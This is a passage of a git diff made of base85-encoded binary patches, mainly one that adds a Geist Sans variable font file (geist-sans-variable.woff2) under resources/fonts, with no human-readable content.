z3X?)kyB<8De)to98%sDe5sg|G%f}e9GKq-cV5lSf7XXGLoNCbE=7pO3fEvOa60}8z
zf+3hxgkL5F1EC-OTAN5O+?CN9%;jSYTAoChB#W#qn1NWG$O;z5km(b6aAg^i_KQ;$
zw5kvxrUw-6gnLXhhFyh&C&&6-B!j*C_#f^n#C2bN?eNjW1V7AvdC-+yb)#;C+ROW{
zEMhe5T3J21f28#*WT$Krq)6n4$%4e6sas|bnG*J)#{0+)*!@(?X*sjVtQcNmV^zyv
z#&R9%8U8Zq*Qrh`(zgFDnZv!Z;q@5d9WTe)zjE@rC%$I))xyVoelUEgS!xrOU)kch
e%GE-Sh#jg=6F;$Pm4E&@?2-Wg``2pQ0RRBGj?)?d

literal 0
HcmV?d00001

diff --git a/resources/fonts/geist-sans-variable.woff2 b/resources/fonts/geist-sans-variable.woff2
new file mode 100644
index 0000000000000000000000000000000000000000..7ebce69dc860e6deede4cf2fb78daf5b17dee4d9
GIT binary patch
literal 69684
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
